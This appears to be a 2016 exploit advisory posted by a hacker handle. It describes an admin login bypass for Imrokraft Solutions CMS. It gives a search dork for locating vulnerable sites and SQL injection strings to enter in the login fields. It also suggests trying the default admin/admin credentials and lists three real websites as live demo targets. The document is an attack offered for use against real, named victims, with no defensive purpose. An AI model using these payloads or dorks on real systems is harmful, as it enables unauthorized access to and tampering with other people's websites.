++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # ____ _ ____ ____ ___ ____ _ ____ _ # __ _| __ ) / | _ / ___|_ _| _ | | |___ / | # / / _ / _ | | | | | _ | || |_) | | __) | | # > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| | # /_/_____/_/ _____/ ____|___|_| ______|_____|_| # ################################################################## # Exploit Title : Imrokraft Solutions CMS Admin Page ByPass # Exploit Author : xBADGIRL21 # Dork : intext:"Designed by Imrokraft Solutions" or intext:"Powered By : Imrokraft Solutions" # Vendor : http://www.imrokraft.com/ # Tested on: [ Windows ] # skype:xbadgirl21 # Date: 2016/07/27 # video Proof : https://www.youtube.com/watch?v=jKOHmH2XId0 ################################################################## # Describe : # This Exploit Allow The Attacker to bypass the admin # page info. # Login to the admin Dashboard Give you Full Access to # Upload or Delete .....etc # PoC: # Put [admin] After url such as : # http://site.com/admin # Now enter fill username or email and Password like the information below : # Username: '=' 'OR' # Password: '=' 'OR' # [!] OR U CAN TRY WITH DEFAULT LOGIN [!] : # Username: admin # Password: admin # Live Demo : # http://aptitudetrivandrum.com/ # http://aspirantonline.com/ # http://www.destinationdesigners.in/ ################################################################## # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ################################################################### More of my Discovered Exploits : https://packetstormsecurity.com/files/author/12483/ http://0day.today/author/29701 https://cxsecurity.com/search/author/DESC/AND/FIND/0/10/xBADGIRL21/